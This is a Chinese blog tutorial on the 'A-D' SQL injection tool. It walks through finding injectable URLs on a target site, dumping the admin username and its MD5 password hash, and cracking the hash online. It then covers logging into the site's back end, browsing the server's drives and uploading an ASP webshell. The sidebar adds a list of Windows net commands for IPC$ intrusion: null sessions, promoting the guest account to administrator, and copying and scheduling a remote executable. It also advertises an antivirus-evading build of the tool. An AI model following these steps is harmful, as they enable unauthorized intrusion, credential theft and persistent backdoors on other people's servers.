工具篇 啊D

最新推荐文章于 2023-05-29 00:19:17 发布
最新推荐文章于 2023-05-29 00:19:17 发布
阅读量1.1k 收藏 5
点赞数 2
分类专栏: 渗透测试 安全测试
检测注入漏洞



先将下载好的正版无毒啊D注入工具打开,大体上先熟悉啊D的功能布局,如注意观察下图左侧的<注入检测>里的<SQL注入检测>、<浏览网页>、<相关工具>选项的功能等,下面会用到



在<检测网址>的栏内可以输入要注入的网址


点击<注入检测>里的<浏览网页>图标,即可浏览该网页


然后稍等片刻,如图下方就出现了红色的<可用注入点>URL,右击它,选择注入就行了





SQL注入



在下图所示的页面中,点击<检测表段>,检测完毕后在选中<admin>,再点击右侧的<检测字段>


等检测完毕后,在<admin>和<password>的前面选中方框


最后,点击右侧的检测内容



稍等一会儿,工具就会检测出类似下图所示的内容


双击<检测内容>中的编号2那一行,就会出现下图的<复制窗口>里的内容


这样,就知道了网站后台的一个账户是<admin>,<password>下面的内容为账户密码的MD5值


复制下来,找到在线MD5免费解密网站即可解密,解密成功后,就可以利用<管理入口检测>功能,找到网站后台,用得到的账户和密码登录了




目录浏览上传木马



如下图所示,先将啊D切换到<相关工具>选项下,然后点击<目录查看>,接着就可以点击<开始检测>


然后就如图所示,进入了对方的C盘下,可以找到对方的网站的绝对路径,就是网站的文件在C盘的哪个文件夹下


这里找到是在C盘web文件夹下



然后,点击下图的<CMD/上传>选项


在图下面的<文件上传><本地文件>选项下选择自己的asp木马存放的位置,然后在<目标位置>选择<c:\web\xiaoma.asp>,点击<上传>


稍等一会,文本框中出现<内容写入结束,祝您好运>字样,就上传小马成功了



最后就如下图,在浏览器中输入小马的网站相对位置,就可以打开传大马的界面了


 在图中分别输入要传的大马的绝对路径和大马源码,点击<save>,就完成了大马的上传。当遇到传不上去大马的时候,可以换个大马源码试试


guangyinglanshan
关注
专栏目录
工具】Unity快速上手制作2D和2.5D游戏的神器TileMap
纯技术流日常开发商业开发记录总结等
04-12 5147
目录 一:运行效果展示(2D&2.5D) 二:制作地面素材库 1.创建Tilemap; 2.创建素材库 三.绘制地图 1.一个单位范围设置 2.框选填充 3.擦除之前的内容 4.智能填充 四.添加场景素材 五:编写人物player控制代码和移动动画 1.人物常规的上下左右移动及动画的切换​ 2.2D和2.5D相机切换逻辑 3.2.5D相机的设置 天地不仁以万物为刍狗,大家好我是幻世界!今天这里记录TileMap搭建2.5D场景和2D场景 ...
【Unity实战 】| 2.5D游戏是如何做出来的呢,2.5D游戏快速制作教程
最新发布
努力前行,总会成为自己心中的那道光
08-09 7万+
玩过游戏的朋友都知道,市面上最常见的游戏多数分为2D和3D两种。 2D和3D游戏之间的差异大家都知道,一个是类似纸片游戏属于二维层面,另一个则是在3D立体空间中游玩。 其中还夹杂着一个2.5D游戏,本文章就来讲一下怎么通过Unity进行2.5D游戏是怎样的以及如何制作2.5D游戏。 制作方法很简单,文中使用到了Tile Map Editor制作2D地图,通过控制相机角度来形成伪3D来制作2.5D效果的游戏。 下面就一起来看看到底是怎样制作的吧!
啊D 最新破解版 网络工具
08-21
================================================================== 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 ------------------------------------------------------------------ 2010/8/20
啊D注入工具
02-15
一款经典的注入工具,让不会 的人也能快速学会拿站,相比明小子我感觉这个更好
啊D注入工具使用指南
06-03
啊D注入攻击是一个很好的工具,可是怎么使用哪,还是一个问题,本文档主要讲述了啊D的使用说明。
啊D——SQL注入工具
12-01
啊D注入工具
ctf crypto工具
STARSG0d的博客
11-06 2849
ctf大整数运算 在ctf比赛中crypto中经常会有一些大整数的运算,比较麻烦,这文章我将介绍一些工具,以及使用方法,十分方便。 Big Integer Calculator v1.12 下面两排是计算公式,包括加法,减法,模运算等 在Base中选择不同的进制运算 没一个数值都有“CL”清除功能,“CLEAR ALL”清除全部 下载地址:https://bbs.pediy.com/...
工具-05-往Linux服务器上传文件工具
Alan0517
11-22 7619
【代码】工具-05-往Linux服务器上传文件工具类。
啊D注入工具教程,入侵入门
05-19
啊D注入工具教程,入侵入门 叫你使用啊D
详细使用阿D注入工具方法
04-09
详细介绍了阿D使用软件的过程,里面童音请无视,什么总统的也请无视。
啊D注入工具_V2.32
07-20
啊d估计是菜鸟最好用的入侵工具之一吧,这是我自己用的啊d ,啊d已经被很多杀毒软件列为恶意软件,一般运行啊d卡巴直接就给删了,我这个修改了一下 ,直接扫描不出病毒,运行时会报警你别管就是了,反正不用每次用啊d都关杀毒软件。
啊D注入工具 V2.32,不错的工具,谁用谁知道
12-26
啊D注入工具 V2.32,不错的工具,谁用谁知道; 啊D注入工具 V2.32,不错的工具,谁用谁知道‘
啊D注入工具+V2.32加强版.rar
02-07
这个工具是我从别人那10分下载的,我也没办法的啊,好的话顶一个,
工具使用 使用CAN适配器测试CAN总线
Roy_tly的博客
10-13 7403
CAN盒使用
工具-应急响应常用工具
smart的博客
09-17 3249
工具-应急响应常用工具在线病毒扫描网站webshell查杀 在线病毒扫描网站 网站域名 功能 http://www.virscan.org 多引擎在线病毒扫描网 v1.02,当前支持 41 款杀毒引擎 https://virusscan.jotti.org Jotti恶意软件扫描系统 http://www.scanvir.com 针对计算机病毒、手机病毒、可疑文件等进行检测分析 https://habo.qq.com 腾讯哈勃分析系统 https://ti.qianxin.
内存溢出分析之工具
列苗
09-28 7849
主要介绍 性能压测工具 jmeter;JDK 自带工具JConsole、JVisualVM;google 推出的 malloc 分析工具 gperftools;eclipse 的 dump 文件分析工具 MAT;sun 推出的 Java 动态追踪工具 btrace;linux 查看进程内存软件 gdb 等的使用
RK3588平台开发系列讲解(工具)ADB的使用
内核笔记
05-29 2880
📢本将介绍ADB的使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值